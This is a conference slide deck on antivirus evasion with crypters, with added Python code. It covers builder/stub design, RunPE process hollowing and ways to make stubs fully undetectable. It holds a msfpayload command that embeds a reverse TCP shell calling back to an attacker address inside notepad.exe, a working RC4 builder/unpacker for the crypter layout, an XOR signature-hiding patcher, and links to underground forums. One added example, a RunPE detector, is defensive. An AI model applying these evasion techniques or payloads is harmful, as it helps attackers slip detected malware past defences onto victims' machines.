AntiVirus Evasion:
Use of Crypters
Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
Whoami
ncd:~ apasamar$ whoami
apasamar
apasamar@incide.es
@apasamar
a.k.a brajan
ncd:~ apasamar$ cat apasamar.cv
Electrical Engineer and Master in Information Security
Co-founder of INCIDE: Electronic Evidence Experts
Forensics / Expert Witness Reports
Incident Response
IT Security Auditors and Consultants
ncd:~ apasamar$ rm apasamar.cv
what is this about...
• Introduction
• AVs: how they work
• Malware types and AV detection
• Evasion techniques
• Self-encryption, polymorphism, obfuscation, compression
• Crypters
• types
• stub
• stub FUD
• Modding techniques
• Resources
introduction
• MALWARE = $$$$$$$$$
• BOTNETS, APT, RANSOMWARE
• AV companies —> detect MALWARE
• BAD GUYS: make MALWARE undetectable

introduction
Bad guys objective:
AV howto
• AntiVirus engines scan binaries on the HARD DISK
• In the common case they do not SCAN MEMORY, only the binaries that 'start' the running processes
• Scan for signatures: byte sequences held in the AV database
• Look for malicious techniques (heuristics): APIs, functions, XOR loops, etc.
• Sandbox (partial execution): look for decryption routines, etc.

Diagram: EXECUTABLE on DISK -> loaded into RAM -> PROCESS; the AV SCAN sits on the disk side, with a "?" on the RAM/process side.

AV howto
• AV analysis process: (diagram)
AV howto
• Recommended: "Abusing File Processing in Malware Detectors for Fun and Profit" (2012), Suman Jana and Vitaly Shmatikov, The University of Texas at Austin

AV howto
• Metasploit Framework (Rapid7)
• Community Edition:
  msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe
  (five passes of the shikata_ga_nai polymorphic encoder, injected into notepad.exe used as a template; msfpayload and msfencode were later merged into msfvenom)
• Pro Edition: generate AV-evading Dynamic Payloads
types of malware and AV detection
• Commercial SPY programs (whitelisted, signed):
• e-blaster
• 007
• perfect keylogger
• ...
• Newly created malware:
• LOW detection (NO known signatures)
• possible heuristic detections

types of malware and AV detection
• Existing malware (very well known; signature and heuristic detections):
• trojans (BiFrost, PoisonIvy, CyberGate, SpyNet, DarkComet)
• downloaders
• password stealers
• reverse shells

types of malware and AV detection
How can we make undetectable malware that AV already detects?
• Crypters:
• Software that encrypts ANY MALWARE, making it undetectable to AV.
crypters
builder / stub
• Builder: responsible for creating the NEW executable, composed of the STUB and the ENCRYPTED MALWARE
• Stub: its mission is to decrypt and run the ENCRYPTED MALWARE

Diagram: the CRYPTER (Builder) takes the STUB and the DETECTED MALWARE, encrypts the malware (XOR, RC4, ...) and writes a new executable: STUB + ENCRYPTED MALWARE. Diagram labels for the payload carrier: exe, dll, resource.

Diagram: output layout is STUB | splitter | CRYPTED MALWARE, or STUB | splitter | CRYPTED MALWARE | splitter | KEY when the key travels with the file; a resource section can always be used instead of appending.
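The appended layout above (stub, splitter, encrypted payload, splitter, key) modelled over byte strings, as an added example that is not code from the slides or from any crypter the author mentions. The payload is a constructed dummy and nothing is executed; the marker value `|-SPLIT-|` and the choice of RC4 are assumptions (the slide names XOR and RC4 as options without fixing either). `build()` plays the builder, `unpack()` plays the stub, or an analyst carving a sample.

```python
"""Added example, not from the slides: the builder/stub file layout.

The builder appends the encrypted payload (and, in the second layout on the
slide, the key) to the stub, separated by a fixed marker, the "splitter".  At
run time the stub searches its own file for that marker, splits the pieces off
and decrypts.  Both sides are modelled over byte strings so the layout can be
inspected offline; the payload is a constructed dummy and nothing is executed.
"""
from __future__ import annotations

SPLITTER = b"|-SPLIT-|"   # assumed marker; real builders use arbitrary byte runs


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: one call both encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build(stub: bytes, payload: bytes, key: bytes) -> bytes:
    """Builder side: STUB | SPLITTER | RC4(payload) | SPLITTER | KEY."""
    encrypted = rc4(key, payload)
    # The stub parses from the end of the file, so a marker inside the stub's
    # own code is harmless; one inside the ciphertext or key would mis-split.
    if SPLITTER in encrypted or SPLITTER in key:
        raise ValueError("splitter occurs in ciphertext or key; re-key and retry")
    return stub + SPLITTER + encrypted + SPLITTER + key


def unpack(image: bytes) -> tuple[bytes, bytes, bytes]:
    """Stub side (or an analyst carving a sample): split on the marker, decrypt.

    Searches from the end because the stub's code embeds the marker constant
    itself; the first occurrence in the file would be that constant, not the
    layout boundary.  Returns (stub_bytes, key, decrypted_payload).
    """
    last = image.rfind(SPLITTER)
    second = image.rfind(SPLITTER, 0, last) if last > 0 else -1
    if second < 0:
        raise ValueError("expected two splitters (payload and key)")
    stub = image[:second]
    encrypted = image[second + len(SPLITTER):last]
    key = image[last + len(SPLITTER):]
    return stub, key, rc4(key, encrypted)


def demo() -> bytes:
    """Round trip over constructed inputs; returns the recovered payload."""
    stub = b"MZ\x90\x00 fake stub code; marker constant: " + SPLITTER + b" ..."
    payload = b"constructed dummy payload, not a real binary"
    key = b"k3y"
    image = build(stub, payload, key)
    out_stub, out_key, plain = unpack(image)
    assert out_stub == stub and out_key == key
    return plain
```

Searching from the end of the file is what makes the layout work even though the stub's own code contains the marker; the same observation is what lets an analyst recover the key and payload from a crypted sample without running it, since in this layout the key is stored in clear right after the last splitter.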
builder / stub
• Crypter types:
• ScanTime: the stub writes the decrypted malware to the HARD DISK before running it, so it only evades the static (scan-time) scan; once dropped, the DETECTED MALWARE is caught by the AV on disk.
• RunTime: the stub decrypts the malware only in RAM and runs it from there; the file on the HARD DISK holds only STUB + ENCRYPTED MALWARE, so the detected bytes never touch the disk.
stub
• STUB modules:
• Decrypt routine
• RunPE (Dynamic Forking) routine

RunPE or Dynamic Forking (diagram, read as a sequence):
• CreateProcess on a host executable with CREATE_SUSPENDED (PROCESS 1)
• GetThreadContext on its main thread: EBX points to the PEB and EAX holds the entry point; the image base is read at [EBX+8] (BaseAddress 1, EP 1)
• ReadFile the decrypted payload and WriteProcessMemory its headers and sections into the suspended process at its own ImageBase (BaseAddress 2); write the new base back at [EBX+8]
• Set EAX to the payload's entry point (EP 2), SetThreadContext, ResumeThread: PROCESS 2 now runs the payload under the host's name
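The same call chain seen from the defender's side, as an added example that is not from the slides: a small matcher that flags a child process when its creator issues CreateProcess with CREATE_SUSPENDED followed by WriteProcessMemory, SetThreadContext and ResumeThread against that child. The trace lines are constructed in a simplified "pid api(args)" format; Sysmon, EDR or sandbox output carries the same fields under other names.

```python
"""Added example, not from the slides: spotting the RunPE / dynamic-forking
call sequence in an API-call trace.

The slide lists the chain the stub performs: CreateProcess(CREATE_SUSPENDED)
-> GetThreadContext -> WriteProcessMemory -> SetThreadContext -> ResumeThread.
A detector keys on that order against a single child process.  The trace
format below is constructed for the example (pid, api, key=value args).
"""
import re
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004  # Windows process-creation flag

# Order the stub must follow. GetThreadContext is not required for the verdict:
# some stubs hard-code the PEB/EP offsets instead of reading the context first.
REQUIRED_ORDER = ["CreateProcess", "WriteProcessMemory", "SetThreadContext", "ResumeThread"]
TRACKED = {"GetThreadContext", "WriteProcessMemory", "SetThreadContext", "ResumeThread"}

LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<api>\w+)\((?P<args>.*)\)$")


def parse(line):
    """'3000 ResumeThread(target=4012)' -> ('3000', 'ResumeThread', {'target': '4012'})."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = dict(kv.split("=", 1) for kv in m["args"].split(", ") if "=" in kv)
    return m["pid"], m["api"], args


def find_runpe(lines):
    """Return the set of child pids whose observed call sequence matches RunPE."""
    per_child = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        _pid, api, args = rec
        if api == "CreateProcess":
            flags = int(args.get("dwCreationFlags", "0"), 0)
            if flags & CREATE_SUSPENDED and args.get("child"):
                per_child[args["child"]].append(api)
        elif api in TRACKED:
            per_child[args.get("target", "")].append(api)
    hits = set()
    for child, apis in per_child.items():
        pos = 0
        for api in apis:                      # in-order subsequence match
            if pos < len(REQUIRED_ORDER) and api == REQUIRED_ORDER[pos]:
                pos += 1
        if pos == len(REQUIRED_ORDER):
            hits.add(child)
    return hits


# Constructed trace: pid 3000 hollows child 4012; pid 5000 is a benign parent
# that creates 5100 without CREATE_SUSPENDED and writes a small buffer.
SAMPLE_TRACE = """
3000 CreateProcess(lpApplicationName=C:\\Windows\\System32\\svchost.exe, dwCreationFlags=0x4, child=4012)
3000 GetThreadContext(target=4012)
3000 WriteProcessMemory(target=4012, size=0x400)
3000 WriteProcessMemory(target=4012, size=0x2a00)
3000 SetThreadContext(target=4012)
3000 ResumeThread(target=4012)
5000 CreateProcess(lpApplicationName=C:\\Windows\\notepad.exe, dwCreationFlags=0x0, child=5100)
5000 WriteProcessMemory(target=5100, size=0x10)
5000 ResumeThread(target=5100)
""".strip().splitlines()
```

A debugger launching its target produces a similar chain (suspended create, memory writes for breakpoints, context changes), so in production the rule is narrowed with what this trace format lacks: the written range covering the child's image base and PE header, and the entry point in the new context pointing outside the original image.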
FUD
• Target: FUD stub (Fully UnDetectable)
• From source code
• From binary code
• How?
• MODDING
modding source code
• Manually or using obfuscation tools:
• Function replacement (SPLIT, ...)
• Function/string/variable renaming and obfuscation; use of rot13 or hex encoding
• Encryption: RC4 and XOR routines are very well known to AVs (the heuristic keys on the recognisable routine, not on the cipher's strength)
• Alternatives: TEA, DES, etc.
• Alternative RunPE routines
• Fake APIs
• TLB (Type Library file)
• Trash code
modding binary file
• Techniques:
• Dsplit/AvFucker
• SignatureFucker
• Hexing
• RIT
• XOR and variants
• Tips
• We have to make the STUB undetectable; the BUILDER is only a tool used at home, never in the wild
• First of all, FIND THE AV SIGNATURES:
• Simple signatures
• Multiple signatures
• Heuristic signatures
• Recommended: "Bypassing Anti-Virus Scanners" (2012), InterNOT Security Team
• What if we use a simple encryption/decryption routine inside the STUB?

Diagram: stub.exe before: EP -> code containing the signatures. After: the region around the OLD EP is stored encrypted (the signatures no longer appear in the file); a NEW EP points at the decryption routine, which restores the region and jumps to the OLD EP.
• ORIGINAL STUB: MULTIPLE AV SCAN (screenshot)

Do NOT use VirusTotal for these scans, or your STUB samples will be sent to the AV companies :(

• ENCRYPTION ROUTINE at a NEW EP:
• insert the routine and point it at the .text SECTION
• from offset 1050
• up to the Import Table
• ENCRYPTION ROUTINE AT NEW EP: used only once, to encrypt the .text section
• Set a breakpoint here, right after the encryption routine, so the encrypted section can be written back to the file
• DECRYPTION AND EXECUTION AT NEW EP: the routine now decrypts the same range and jumps to the OLD EP
• MODIFIED STUB: MULTIPLE AV SCAN: 16 AVs KO
• DSplit:
Diagram: Header + EXE body cut into growing prefixes of 1000, 2000, 3000, ... N×1000 bytes; each prefix is scanned, and the first one that is detected bounds where the signature ends.

• AvFucker:
Diagram: Header + EXE body with one 1000-byte window at a time overwritten with zeros (0000000000); each variant is scanned, and the variant that is no longer detected marks the window holding the signature.
• RIT technique
• Find out the AV signature
• If the signature is located in instruction code —> break the flow
• jump to another address (a hole in the section where you can write your code)
• execute the pending instructions there
• return/jump to the appropriate instruction
• XOR technique
• Find out the AV signature
• XOR the detected bytes with any value, e.g. 22
• Modify the EP, or jump to your hole
• Apply XOR 22 again to the modified bytes (restoring them)
• Return/jump to the appropriate instruction

Screenshots: detected bytes (at EP); XOR of the detected bytes; new EP (XORs and jump to the original EP)
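The XOR technique over a file image, as an added example that is not from the slides: `patch()` plays the modder (locate the detected bytes, XOR them in the file with the slide's value 0x22, record offset/length/key for the new-EP routine), `runtime_restore()` plays the code at the NEW EP (XOR the same bytes back before jumping to the OLD EP). The image and the "detected bytes" are constructed; the detector is a one-line substring match standing in for the AV signature.

```python
"""Added example, not from the slides: the XOR technique on a file image.

Static scanners never see the signature once its bytes are XORed in the file;
the CPU sees the original bytes because the code at the new entry point XORs
them back before jumping to the old one.  Image and signature are constructed.
"""
from __future__ import annotations
from dataclasses import dataclass

KEY = 0x22   # value used on the slide; any non-zero byte works
# Constructed "detected bytes at EP": a push ebp / mov ebp,esp / call / pop ebp prologue.
SIGNATURE = b"\x55\x8b\xec\xe8\x00\x00\x00\x00\x5d"


@dataclass(frozen=True)
class Patch:
    """What the new-EP routine must embed: where to XOR, how much, with what."""
    offset: int
    length: int
    key: int


def detected(image: bytes) -> bool:
    """Stand-in for the AV: the signature appears verbatim somewhere in the file."""
    return SIGNATURE in image


def xor_range(image: bytes, offset: int, length: int, key: int) -> bytes:
    buf = bytearray(image)
    for i in range(offset, offset + length):
        buf[i] ^= key
    return bytes(buf)


def patch(image: bytes, key: int = KEY) -> tuple[bytes, Patch]:
    """Modder side: XOR the detected bytes in the file and hand back the
    parameters for the restore routine.  Fails loudly if the result is still
    detected (key 0x00, or a second signature covering the same bytes)."""
    off = image.find(SIGNATURE)
    if off < 0:
        raise ValueError("signature not present; nothing to hide")
    p = Patch(off, len(SIGNATURE), key)
    out = xor_range(image, p.offset, p.length, p.key)
    if detected(out):
        raise ValueError("patched image still detected; choose another key")
    return out, p


def runtime_restore(image: bytes, p: Patch) -> bytes:
    """What the code at the NEW EP does before jumping to the OLD EP.
    In x86 terms (mnemonics only, addresses as the modder fills them in):
        mov  ecx, LENGTH
        mov  esi, VA_OF_OFFSET
      l: xor  byte ptr [esi], KEY
        inc  esi
        dec  ecx
        jnz  l
        jmp  OLD_EP
    """
    return xor_range(image, p.offset, p.length, p.key)


def make_image() -> bytes:
    """Constructed 'stub': 64-byte header, 32 NOPs, the signature at offset 96,
    a ret, and padding."""
    return b"MZ" + b"\x00" * 62 + b"\x90" * 32 + SIGNATURE + b"\xc3" + b"\x90" * 16
```

Two things the slide leaves implicit and the routine depends on: the section holding the XORed bytes must be writable at run time (the .text section's characteristics need IMAGE_SCN_MEM_WRITE, or the routine calls VirtualProtect first), and the restore must run before any other code touches those bytes, which is why it sits at the new entry point rather than anywhere later.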
other techniques
• Add fake APIs
• Hex string edits
• Move/change function calls
• Change the function call type: by name / by offset
• Insert the detected DLL function into the stub code
resources
• http://www.indetectables.net
• http://www.udtools.net
• http://www.masters-hackers.info
• http://www.level-23.biz/
• http://www.corp-51.net/
• http://www.underc0de.org
Avda. Diagonal, 640 6ª Planta
08017 Barcelona (Spain)
info@incide.es
http://www.incide.es
http://www.twitter.com/1NC1D3
http://www.atrapadosporlosbits.com
http://www.youtube.com/incidetube
INCIDE - Investigación Digital
Tel./Fax. +34 932 546 277 / +34 932 546 314
ANY QUESTIONS?
